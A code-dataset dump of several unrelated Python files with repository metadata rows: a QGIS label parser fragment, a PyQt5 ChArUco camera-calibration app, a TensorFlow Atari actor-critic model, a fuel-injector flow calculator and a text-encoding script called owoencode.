yOffset = eKConverter.convertUnitToPixel(value=yOffset, unit=offsetUnit)
if xOffset == 0 and yOffset == 0:
yOffset = -1.5
fontName = labelFormat.font().family()
fontColor = labelFormat.color().name()
# fontStyle = labelFormat.namedStyle()
fontSize = float(labelFormat.size())
fontSizeUnit = labelFormat.sizeUnit()
# convert the size to pixel
fontSize = eKConverter.convertUnitToPixel(value = fontSize, unit = fontSizeUnit)
# Refer: https://qgis.org/api/classQgsTextBufferSettings.html
strokeColor = labelFormat.buffer().color().name()
strokeWidth = labelFormat.buffer().size()
strokeWidthUnit = labelFormat.buffer().sizeUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# TEMP
placement = settings.placement
placement = eKConverter.convertLabelPlacement(placement)
# Export information here
labelPaint = {
'text-color': fontColor,
'text-halo-color': strokeColor,
'text-halo-width': strokeWidth,
}
labelLayout = {
'text-font': [fontName],
'text-field': ["get", field],
'text-size': fontSize,
'text-offset': [xOffset, yOffset],
'text-anchor': self.__getAnchor(settings),
'text-rotate': self.__getRotation(settings),
'symbol-placement': placement,
}
return {
'type': 'symbol',
'paint': labelPaint,
'layout': labelLayout
}
def readZoomLevel(self, settings):
minLevel = 0
maxLevel = 22
if settings.scaleVisibility:
minLevel = eKConverter.convertScaleToLevel(scale = settings.minimumScale)
if settings.maximumScale != 0:
maxLevel = eKConverter.convertScaleToLevel(scale = settings.maximumScale)
# Export information here
return {
'minLevel': minLevel,
'maxLevel': maxLevel,
'visible': True
}
# Refer: https://qgis.org/pyqgis/3.0/core/Text/QgsTextBackgroundSettings.html
def readBackground(self, settings):
background = settings().format().background()
if background.enabled():
# Identify the type of background
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a91794614626586cc1f3d861179cc26f9
# basic shape like: rectangle = 0,
# square = 1, eclipse = 2, circle = 3
# or svg image = 4
# or marker symbol = 5
backgroundType = background.type()
# Identify the type of size
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a45798d989b02e1dfcad9a6f1db4cd153
# 1 = buffer: the size of background = size of label + buffer
# 2 = fixed: the size of background = fixed
# 3 = percent: determine by the size of text size
# sizeType = background.sizeType()
# Get the size information
# this return QSizeF object
size = background.size()
width = size.width()
height = size.height()
# Identify the unit of size
sizeUnit = background.sizeUnit()
# then convert the size to pixel
width = eKConverter.convertUnitToPixel(value = width, unit = sizeUnit)
height = eKConverter.convertUnitToPixel(value = height, unit = sizeUnit)
# Get the fill and stroke
# apply for basic shape only
if backgroundType < 4:
# fillColor = background.fillColor().name()
# strokeColor = background.strokeColor().name()
strokeWidth = background.strokeWidth()
strokeWidthUnit = background.strokeWidthUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# Export information here
# ...
def readPlacement(self, settings):
layerType = settings.layerType()
# Refer: https://qgis.org/api/classQgsWkbTypes.html#a60e72c2f73cb07fdbcdbc2d5068b5d9c
# POINT
if layerType == 0:
# Point has: Cartographic (6),
# around point (0),
# offset from point (1)
a = 1
# LINESTRING
elif layerType == 1:
# Line has: Parallel, curved, horizontal
a = 2
# POLYGON
elif layerType == 2:
# Polygon has: Offset from point, horizontal,
# around centroid, free, using perimeter,
# using perimeter (curved), outside polygons
a = 3
def __getAnchor(self, settings):
placement = settings.placement
# Only offset from point has Anchor
if placement == 1:
quadOffset = settings.quadOffset
return eKConverter.convertQuadrantToAnchor(quadOffset)
# Other set default
else:
return 'bottom'
def __getRotation(self, settings):
# In-case user defined rotation:
definedProperties = settings.dataDefinedProperties()
LABEL_ROTATION = 96
rotationProperty = definedProperties.property(LABEL_ROTATION)
if rotationProperty.isActive():
fieldBase = rotationProperty.field()
return ['get', fieldBase]
else:
placement = settings.placement
# Only offset from point has Rotation
if placement == 1:
return settings.angleOffset
else:
return 0
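# Usage sketch (an addition; a QGIS Python environment is assumed, and
# `layer` stands for a hypothetical vector layer with labeling enabled):
# settings = layer.labeling().settings()
# parser = LabelParser(layer.labeling())
# style = parser._readTextStyle(settings)
# zoom = parser.readZoomLevel(settings)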
| 36.767045
| 111
| 0.591871
| 567
| 6,471
| 6.726631
| 0.326279
| 0.053225
| 0.062402
| 0.022286
| 0.125852
| 0.104352
| 0.104352
| 0.076036
| 0.050865
| 0.050865
| 0
| 0.021808
| 0.319734
| 6,471
| 176
| 112
| 36.767045
| 0.844616
| 0.245403
| 0
| 0.115385
| 0
| 0
| 0.03765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067308
| false
| 0
| 0.038462
| 0
| 0.182692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa690096a6121167933e215558dabc81606d2f3
| 8,069
|
py
|
Python
|
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# coding by liuyunfei
# 2020-4-12
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox
from PyQt5.QtCore import QThread, pyqtSignal, QDateTime, QObject, QMutexLocker, QMutex, QTimer
from PyQt5.QtGui import QPixmap
from PyQt5 import Qt, QtCore
from PyQt5.QtCore import QByteArray
from PyQt5.QtGui import QPixmap, QImage
import os
import cv2
import time
import glob
import numpy as np
from copy import deepcopy
from ui.ui import *
image_mutex = QMutex()
image = None
org_img = None
camera_mutex = QMutex()
num_i = 0
def cv2img_to_Qpixmap(frame):
if len(frame.shape) == 2:
cvRGBImg = cv2.cvtColor(frame,cv2.COLOR_GRAY2RGB)
elif len(frame.shape) == 3:
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h,w,c = cvRGBImg.shape
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
qimg = QImage(cvRGBImg.data, w, h, c*w, QImage.Format_RGB888)
pixmap01 = QPixmap.fromImage(qimg)
pix = QPixmap(pixmap01)
return pix
class UpdateImg(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(UpdateImg, self).__init__()
self.image = None
def run(self):
fnames = glob.glob("imgs/*.png")
allCorners = []
allIds = []
for name in fnames:
im = cv2.imread(name,1)
dictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
            board = cv2.aruco.CharucoBoard_create(7, 9, .015, .0111, dictionary)  # 0.025 is in meters
            corners, ids, rejected = cv2.aruco.detectMarkers(im, dictionary)
            print(len(corners))
            if corners is None or len(corners) == 0:
                continue
            ret, charucoCorners, charucoIds = cv2.aruco.interpolateCornersCharuco(corners, ids, im, board)  # these parameters depend on the initial values detected by detectMarkers
if corners is not None and charucoIds is not None:
if len(corners) == 31:
allCorners.append(charucoCorners)
allIds.append(charucoIds)
cv2.aruco.drawDetectedMarkers(im,corners,ids)
self.update_pix1.emit([im])
time.sleep(0.1)
w,h=im.shape[1],im.shape[0]
ret, K, dist_coef, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(allCorners, allIds, board,(w,h),None,None)
dist_coef = dist_coef[0]
txt = "Matrix =\n {0}\nDist_coef =\n {1}\n{2}\n{3}\n{4}\n{5}\n\n- {6}".format(K,dist_coef[0],dist_coef[1],\
dist_coef[2],dist_coef[3],dist_coef[4],"By:Liu Yunfei")
self.update_pix1.emit([None,txt])
class ColorImageThread(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(ColorImageThread, self).__init__()
def run(self):
global image
global image_mutex
while True:
image_mutex.lock()
img = deepcopy(image)
image_mutex.unlock()
if img is not None:
self.update_pix1.emit([img])
time.sleep(0.02)
class MyWindow(QMainWindow,Ui_Dialog):
def __init__(self, parent=None):
super(MyWindow, self).__init__(parent)
self.setupUi(self)
self.open_camera_button.clicked.connect(self.OnOpenCameraBtn)
self.capture_button.clicked.connect(self.OnCaptureBtn)
self.close_camera_button.clicked.connect(self.OnCloseCameraBtn)
self.cali_button.clicked.connect(self.OnCaliBtn)
self.set_button.clicked.connect(self.getSetInfo)
self.image_label.setScaledContents(False)
self.setWindowTitle("Camera Calibration using ChAruco by LiuYunfei")
self.timer = QTimer()
self.timer.timeout.connect(self.timerEvent)
self.camera_image = None
self.camera_no = 0
self.camera_width = 0
self.camera_height = 0
self.aruco_width = 0
self.aruco_height = 0
self.save_folder = ""
self.cap = None
self.sleep = False
self.getSetInfo()
def getSetInfo(self):
camera_no = self.lineEdit1.text()
camera_width = self.lineEdit2.text()
camera_height = self.lineEdit3.text()
aruco_width = self.lineEdit4.text()
aruco_height = self.lineEdit5.text()
self.camera_no = int(camera_no)
self.camera_width = int(camera_width)
self.camera_height = int(camera_height)
self.aruco_width = int(aruco_width)
self.aruco_height = int(aruco_height)
def timerEvent(self):
global image
global org_img
global image_mutex
        if not self.sleep:
time.sleep(2)
self.sleep = True
camera_mutex.lock()
ret,frame = self.cap.read()
camera_mutex.unlock()
if ret:
image_mutex.lock()
org_img = deepcopy(frame)
image_mutex.unlock()
dd = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
            board = cv2.aruco.CharucoBoard_create(self.aruco_width, self.aruco_height, .015, .0111, dd)  # board square/marker sizes are in meters
corners, ids, rejected = cv2.aruco.detectMarkers(frame,dd)
            if corners is None or len(corners) == 0:
pass
else:
cv2.aruco.drawDetectedMarkers(frame,corners,ids)
image_mutex.lock()
image = deepcopy(frame)
image_mutex.unlock()
def updateColorImage(self,list_tmp):
img = list_tmp[0]
if img is not None:
qimg = cv2img_to_Qpixmap(img)
pix2 = qimg.scaled(800, 600, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
self.image_label.setPixmap(pix2)
if len(list_tmp) > 1:
text = list_tmp[1]
self.label_result.setText(text)
def OnOpenCameraBtn(self):
self.cap = cv2.VideoCapture(self.camera_no)
fps = self.cap.get(cv2.CAP_PROP_FPS)
print("FPS = {} fps".format(fps))
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH,self.camera_width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT,self.camera_height)
time.sleep(0.5)
self.timer.start(30)
self.updataImg = ColorImageThread()
self.updataImg.update_pix1.connect(self.updateColorImage)
self.uithread1 = QThread()
self.updataImg.moveToThread(self.uithread1)
self.uithread1.started.connect(self.updataImg.run)
self.uithread1.start()
def OnCaliBtn(self):
global image
global image_mutex
self.updateimg = UpdateImg()
self.updateimg.update_pix1.connect(self.updateColorImage)
self.ui2 = QThread()
self.updateimg.moveToThread(self.ui2)
self.ui2.started.connect(self.updateimg.run)
self.ui2.start()
def UpdateTimeUI(self,data):
self.label_result.setText(data)
def OnCaptureBtn(self):
global image
global image_mutex
global org_img
global num_i
image_mutex.lock()
img = deepcopy(org_img)
image_mutex.unlock()
name = "imgs/{}.png".format(num_i)
cv2.imwrite(name,img)
print("({}),img saved. {}".format(num_i,name))
        num_i += 1
def OnCloseCameraBtn(self):
self.timer.stop()
self.updataImg.disconnect()
#self.updataImg.update_pix1.disconnect()
self.uithread1.terminate()
camera_mutex.lock()
self.cap.release()
camera_mutex.unlock()
if __name__ == '__main__':
app = QApplication(sys.argv)
myWin = MyWindow()
myWin.show()
sys.exit(app.exec_())
| 34.33617
| 137
| 0.587433
| 919
| 8,069
| 5.002176
| 0.249184
| 0.028279
| 0.021753
| 0.026104
| 0.224712
| 0.159452
| 0.114422
| 0.075266
| 0.054818
| 0.03437
| 0
| 0.027903
| 0.311563
| 8,069
| 234
| 138
| 34.482906
| 0.79964
| 0.01735
| 0
| 0.17801
| 0
| 0.005236
| 0.023292
| 0.003643
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073298
| false
| 0.005236
| 0.073298
| 0
| 0.17801
| 0.015707
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afaaa12bee233defec8a78a507b98355a9769f87
| 11,423
|
py
|
Python
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 10
|
2018-07-31T21:04:02.000Z
|
2022-02-03T18:58:45.000Z
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | null | null | null |
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 1
|
2018-08-01T18:09:35.000Z
|
2018-08-01T18:09:35.000Z
|
"""An implementation of an actor-critic model that is aimed at Atari games."""
import gym
import numpy as np
import tensorflow as tf
import actorcritic.nn as nn
from actorcritic.baselines import StateValueFunction
from actorcritic.model import ActorCriticModel
from actorcritic.policies import SoftmaxPolicy
class AtariModel(ActorCriticModel):
"""An :obj:`~actorcritic.model.ActorCriticModel` that follows the A3C and ACKTR paper.
The observations are sent to three convolutional layers followed by a fully connected layer, each using rectifier
activation functions (ReLU). The policy and the baseline use fully connected layers built on top of the last hidden
fully connected layer separately. The policy layer has one unit for each action and its outputs are used as logits
for a categorical distribution (softmax). The baseline layer has only one unit which represents its value.
The weights of the layers are orthogonally initialized.
Detailed network architecture:
- Conv2D: 32 filters 8x8, stride 4
- ReLU
- Conv2D: 64 filters 4x4, stride 2
- ReLU
- Conv2D: 64 filters 3x3, stride 1 (number of filters based on argument `conv3_num_filters`)
- Flatten
- Fully connected: 512 units
- ReLU
- Fully connected (policy): units = number of actions / Fully connected (baseline): 1 unit
A2C uses 64 filters in the third convolutional layer. ACKTR uses 32.
The policy is a :obj:`~actorcritic.policies.SoftmaxPolicy`.
The baseline is a :obj:`~actorcritic.baselines.StateValueFunction`.
See Also:
This network architecture was originally used in: https://www.nature.com/articles/nature14236
"""
def __init__(self, observation_space, action_space, conv3_num_filters=64, random_seed=None, name=None):
"""
Args:
observation_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`observations_placeholder` and the
:attr:`bootstrap_observations_placeholder`.
action_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`actions_placeholder`.
conv3_num_filters (:obj:`int`, optional):
Number of filters used for the third convolutional layer, defaults to 64. ACKTR uses 32.
random_seed (:obj:`int`, optional):
                A random seed used for sampling from the :obj:`~actorcritic.policies.SoftmaxPolicy`.
name (:obj:`string`, optional):
A name for this model.
"""
super().__init__(observation_space, action_space)
assert isinstance(action_space, gym.spaces.Discrete)
assert isinstance(observation_space, gym.spaces.Box)
self._num_actions = action_space.n
self._conv3_num_filters = conv3_num_filters
self._name = name
# TODO
# used to convert the outputs of the policy and the baseline back to the batch-major format of the inputs
# because the values are flattened in between
with tf.name_scope('shapes'):
observations_shape = tf.shape(self.observations_placeholder)
with tf.name_scope('input_shape'):
input_shape = observations_shape[:2]
with tf.name_scope('batch_size'):
batch_size = input_shape[0]
with tf.name_scope('num_steps'):
num_steps = input_shape[1]
with tf.name_scope('bootstrap_input_shape'):
bootstrap_input_shape = tf.shape(self.bootstrap_observations_placeholder)[:1]
num_stack = observation_space.shape[-1]
# the observations are passed in uint8 to save memory and then converted to scalars in range [0,1] on the gpu
# by dividing by 255
with tf.name_scope('normalized_observations'):
normalized_observations = tf.cast(self.observations_placeholder, dtype=tf.float32) / 255.0
normalized_bootstrap_observations = tf.cast(self.bootstrap_observations_placeholder,
dtype=tf.float32) / 255.0
# convert from batch-major format [environment, step] to one flat vector [environment * step] by stacking the
# steps of each environment
# this is necessary since the neural network operations only support batch inputs
with tf.name_scope('flat_observations'):
self._flat_observations = tf.stop_gradient(
tf.reshape(normalized_observations, (-1,) + observation_space.shape))
flat_bootstrap_observations = tf.stop_gradient(
tf.reshape(normalized_bootstrap_observations, (-1,) + observation_space.shape))
with tf.variable_scope(self._name, 'AtariModel'):
self._params = dict()
# create parameters for all layers
self._build_params(num_input_channels=num_stack)
# create layers for the policy and the baseline that use the standard observations as input
self._preactivations, self._activations = self._build_layers(self._flat_observations, build_policy=True)
# create layers for the bootstrap values that use the next observations as input
_, bootstrap_activations = self._build_layers(flat_bootstrap_observations, build_policy=False)
with tf.name_scope('policy'):
policy_logits = tf.reshape(self._activations['fc_policy'], [batch_size, num_steps, self._num_actions])
self._policy = SoftmaxPolicy(policy_logits, self.actions_placeholder, random_seed)
with tf.name_scope('baseline'):
baseline_logits = tf.reshape(self._activations['fc_baseline'], input_shape)
self._baseline = StateValueFunction(baseline_logits)
with tf.name_scope('bootstrap_values'):
self._bootstrap_values = tf.reshape(bootstrap_activations['fc_baseline'], bootstrap_input_shape)
def _build_params(self, num_input_channels):
with tf.name_scope('initializers'):
# values of the initializers taken from original a2c implementation
weights_initializer = tf.orthogonal_initializer(np.sqrt(2.), dtype=tf.float32)
bias_initializer = tf.zeros_initializer(dtype=tf.float32)
policy_weights_initializer = tf.orthogonal_initializer(0.01, dtype=tf.float32)
baseline_weights_initializer = tf.orthogonal_initializer(1., dtype=tf.float32)
with tf.variable_scope('conv1'):
conv1_num_filters = 32
conv1_filter_extent = 8
self._params['conv1'] = nn.conv2d_params(
num_input_channels, conv1_num_filters, conv1_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv2'):
conv2_num_filters = 64
conv2_filter_extent = 4
self._params['conv2'] = nn.conv2d_params(
conv1_num_filters, conv2_num_filters, conv2_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv3'):
conv3_filter_extent = 3
self._params['conv3'] = nn.conv2d_params(
conv2_num_filters, self._conv3_num_filters, conv3_filter_extent, tf.float32,
weights_initializer, bias_initializer)
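            # With the canonical 84x84 Atari frames, the VALID convolutions give
            # (84 - 8)/4 + 1 = 20, then (20 - 4)/2 + 1 = 9, then 9 - 3 + 1 = 7,
            # so the flattened spatial size is 7 * 7 = 49 (the constant below).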
conv3_flat_size = 49 * self._conv3_num_filters # TODO don't hardcode
with tf.variable_scope('fc4'):
fc4_output_size = 512
self._params['fc4'] = nn.fully_connected_params(
conv3_flat_size, fc4_output_size, tf.float32, weights_initializer, bias_initializer)
with tf.variable_scope('fc_policy'):
self._params['fc_policy'] = nn.fully_connected_params(
fc4_output_size, self._num_actions, tf.float32, policy_weights_initializer, bias_initializer)
with tf.variable_scope('fc_baseline'):
self._params['fc_baseline'] = nn.fully_connected_params(
fc4_output_size, 1, tf.float32, baseline_weights_initializer, bias_initializer)
# noinspection PyShadowingBuiltins
def _build_layers(self, input, build_policy):
preactivations = dict()
activations = dict()
with tf.variable_scope('conv1', reuse=True):
conv1_pre = nn.conv2d(input, self._params['conv1'], stride=4, padding='VALID')
conv1 = tf.nn.relu(conv1_pre)
preactivations['conv1'] = conv1_pre
activations['conv1'] = conv1
with tf.variable_scope('conv2', reuse=True):
conv2_pre = nn.conv2d(conv1, self._params['conv2'], stride=2, padding='VALID')
conv2 = tf.nn.relu(conv2_pre)
preactivations['conv2'] = conv2_pre
activations['conv2'] = conv2
with tf.variable_scope('conv3', reuse=True):
conv3_pre = nn.conv2d(conv2, self._params['conv3'], stride=1, padding='VALID')
conv3 = tf.nn.relu(conv3_pre)
preactivations['conv3'] = conv3_pre
with tf.name_scope('flat'):
conv3_flat = nn.flatten(conv3)
activations['conv3'] = conv3_flat
with tf.variable_scope('fc4', reuse=True):
fc4_pre = nn.fully_connected(conv3_flat, self._params['fc4'])
fc4 = tf.nn.relu(fc4_pre)
preactivations['fc4'] = fc4_pre
activations['fc4'] = fc4
if build_policy:
with tf.variable_scope('fc_policy', reuse=True):
fc_policy = nn.fully_connected(fc4, self._params['fc_policy'])
activations['fc_policy'] = fc_policy
with tf.variable_scope('fc_baseline', reuse=True):
fc_baseline = nn.fully_connected(fc4, self._params['fc_baseline'])
activations['fc_baseline'] = fc_baseline
return preactivations, activations
def register_layers(self, layer_collection):
"""Registers the layers of this model (neural net) in the specified :obj:`kfac.LayerCollection`
(required for K-FAC).
Args:
layer_collection (:obj:`kfac.LayerCollection`):
A layer collection used by the :obj:`~kfac.KfacOptimizer`.
"""
layer_collection.register_conv2d(
self._params['conv1'], strides=[1, 4, 4, 1], padding='VALID',
inputs=self._flat_observations, outputs=self._preactivations['conv1'])
layer_collection.register_conv2d(
self._params['conv2'], strides=[1, 2, 2, 1], padding='VALID',
inputs=self._activations['conv1'], outputs=self._preactivations['conv2'])
layer_collection.register_conv2d(
self._params['conv3'], strides=[1, 1, 1, 1], padding='VALID',
inputs=self._activations['conv2'], outputs=self._preactivations['conv3'])
layer_collection.register_fully_connected(
self._params['fc4'], inputs=self._activations['conv3'], outputs=self._preactivations['fc4'])
layer_collection.register_fully_connected(
self._params['fc_policy'], inputs=self._activations['fc4'], outputs=self._activations['fc_policy'])
layer_collection.register_fully_connected(
self._params['fc_baseline'], inputs=self._activations['fc4'], outputs=self._activations['fc_baseline'])
| 46.246964
| 119
| 0.660597
| 1,344
| 11,423
| 5.37872
| 0.186756
| 0.02075
| 0.025176
| 0.034168
| 0.27611
| 0.181353
| 0.135565
| 0.087011
| 0.052704
| 0.044958
| 0
| 0.025163
| 0.248534
| 11,423
| 246
| 120
| 46.434959
| 0.816985
| 0.269281
| 0
| 0.068702
| 0
| 0
| 0.064225
| 0.005445
| 0
| 0
| 0
| 0.004065
| 0.015267
| 1
| 0.030534
| false
| 0
| 0.053435
| 0
| 0.099237
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb151ddaf6fe45b7776879d93b6a4036ec2ff77
| 2,863
|
py
|
Python
|
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
flow54/fuel_injector.py
|
corygoates/Flow54
|
d24fe113afb932df6a910b560c6d491693b87592
|
[
"MIT"
] | null | null | null |
import copy
import numpy as np
from compressible_tools import *
class FuelInjector:
"""A fuel injector.
Parameters
----------
fuel : Species
The fluid being fed through the injector.
T : float
Inlet temperature of injector.
A : float
Cross-sectional area.
"""
def __init__(self, fuel, T, A):
# Store
self.fuel = fuel
self.T = T
self.A = A
def calc_subcritical_injector_pressure(self, m_dot, p_ext):
"""Calculates the required pressure in the injector to supply the given massflow against the given exterior pressure. Assumes the injector is subsonic but compressible.
Parameters
----------
m_dot : float
Required massflow.
p_ext : float
Exterior pressure.
Returns
-------
        p_inj : float
            Required injector pressure.
        p_crit : float
            Critical pressure above which the subcritical assumption breaks.
"""
# Define function to find the root of
def f(p_inj):
return self.subcritical_massflow(p_inj, p_ext)-m_dot
# Find root using secant method
p0 = p_ext*1.1
p1 = p_ext*1.2
f0 = f(p0)
f1 = f(p1)
while abs(f1/m_dot)>1e-12:
# Get new pressure guess
p2 = p1-f1*(p0-p1)/(f0-f1)
# Update for next iteration
p0 = p1
p1 = p2
f0 = f1
f1 = f(p1)
# Check the result is subcritical
p_crit = (0.5*(self.fuel.gamma+1.0))**(self.fuel.gamma/(self.fuel.gamma-1.0))*p_ext
if p1 >= p_crit:
raise RuntimeError("Subcritical assumption of injector violated. Critical pressure is {0:1.6e}".format(p_crit))
return p1, p_crit
def subcritical_massflow(self, p_inj, p_ext):
"""Gives the massflow through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
        p_inj : float
            Injector pressure.
        p_ext : float
            Exterior pressure.
Returns
-------
m_dot : float
Massflow.
"""
a = (p_ext/p_inj)**(2.0/self.fuel.gamma)-(p_ext/p_inj)**((self.fuel.gamma+1.0)/self.fuel.gamma)
b = p_inj**2/(self.fuel.R_g*self.T)*a
c = 2.0*self.fuel.gamma/(self.fuel.gamma-1.0)*b
return self.A*np.sqrt(c)
def calc_velocity(self, p_inj, p_ext):
"""Gives the velocity through the injector based on the injector pressure assuming the flow is subcritical.
Parameters
----------
        p_inj : float
            Injector pressure.
        p_ext : float
            Exterior pressure.
Returns
-------
V : float
Velocity
"""
# Calculate massflow
m_dot = self.subcritical_massflow(p_inj, p_ext)
# Calculate density
rho = p_inj/(self.fuel.R_g*self.T)
return m_dot/(rho*self.A)
| 24.895652
| 176
| 0.550472
| 373
| 2,863
| 4.096515
| 0.294906
| 0.062827
| 0.068063
| 0.020942
| 0.311518
| 0.301047
| 0.281414
| 0.21466
| 0.187173
| 0.149215
| 0
| 0.026036
| 0.342648
| 2,863
| 115
| 177
| 24.895652
| 0.785866
| 0.389801
| 0
| 0.058824
| 0
| 0
| 0.051389
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.147059
| false
| 0
| 0.088235
| 0.029412
| 0.382353
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb26810722dea2343152102b81238f0ece5d0c5
| 1,976
|
py
|
Python
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 4
|
2020-08-10T06:01:35.000Z
|
2021-08-30T02:26:29.000Z
|
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | null | null | null |
owoencode.py
|
glitchfur/owoencoder
|
ed81a03ba4bd504ca2de4da80fa618b12363b9db
|
[
"MIT"
] | 1
|
2021-06-02T09:16:43.000Z
|
2021-06-02T09:16:43.000Z
|
#!/usr/bin/env python3
# owoencode.py, a part of owoencoder
# Made by Glitch, 2020
# https://www.glitchfur.net
from sys import argv, stdout, stderr
from os.path import exists, split
from os import remove
KEEP_ORIG = False
STDOUT_FLAG = False
def main():
if len(argv) < 2:
print("The syntax for running this script is as follows:")
print("python owoencode.py [-kc] <original_file> [ ... ]")
exit(0)
in_fns = argv[1:]
# There is probably a better way to handle parameters. But considering
# there are only two, I'm not too worried about it right now.
    for param in in_fns[:]:  # iterate over a copy, since in_fns is mutated below
if param.startswith("-"):
global KEEP_ORIG
global STDOUT_FLAG
if "k" in param:
KEEP_ORIG = True
if "c" in param:
STDOUT_FLAG = True
KEEP_ORIG = True # Output going to stdout, keep original file
in_fns.remove(param)
    for fn in in_fns[:]:  # iterate over a copy, since entries may be removed below
if not exists(fn):
print("%s: No such file or directory" % fn, file=stderr)
exit(1)
if exists("%s.owo" % fn):
print("%s: Encoding would cause a naming conflict " \
"with an existing file, ignoring" % fn)
in_fns.remove(fn)
out_fns = ["%s.owo" % fn for fn in in_fns]
for i in range(len(in_fns)):
encode(in_fns[i], out_fns[i])
def encode(in_fn, out_fn):
in_fp = open(in_fn, "rb")
    if not STDOUT_FLAG:
out_fp = open(out_fn, "w")
else:
out_fp = stdout
while True:
in_buffer = in_fp.read(1048576) # read 1MB at a time
if not in_buffer:
break
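        # Each input byte expands to 8 bits, and each bit to a 3-character
        # token ("OwO" for 1, "UwU" for 0), so output is 24x the input size.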
out_buffer = ''.join([bin(byte)[2:].zfill(8) for byte in in_buffer])
out_fp.write(out_buffer.replace("1", "OwO").replace("0", "UwU"))
in_fp.close()
    if not STDOUT_FLAG:
out_fp.close()
    if not KEEP_ORIG:
remove(in_fn)
if __name__ == "__main__":
main()
| 30.875
| 77
| 0.577935
| 292
| 1,976
| 3.753425
| 0.434932
| 0.036496
| 0.041058
| 0.016423
| 0.062044
| 0.040146
| 0
| 0
| 0
| 0
| 0
| 0.015373
| 0.308704
| 1,976
| 63
| 78
| 31.365079
| 0.786969
| 0.148785
| 0
| 0.078431
| 0
| 0
| 0.140382
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.058824
| 0
| 0.098039
| 0.078431
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afb31209b87b0007cddea5b09c524bff1b45d36d
| 2,589
|
py
|
Python
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | 2
|
2018-10-09T09:59:45.000Z
|
2021-11-21T17:01:47.000Z
|
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
80b86b5b3f92ef28102ac0f5049bb495b5cc07f9
|
[
"Apache-2.0"
] | null | null | null |
generators/query_gen.py
|
Abhipanda4/RQs_in_Regex_Graphs
|
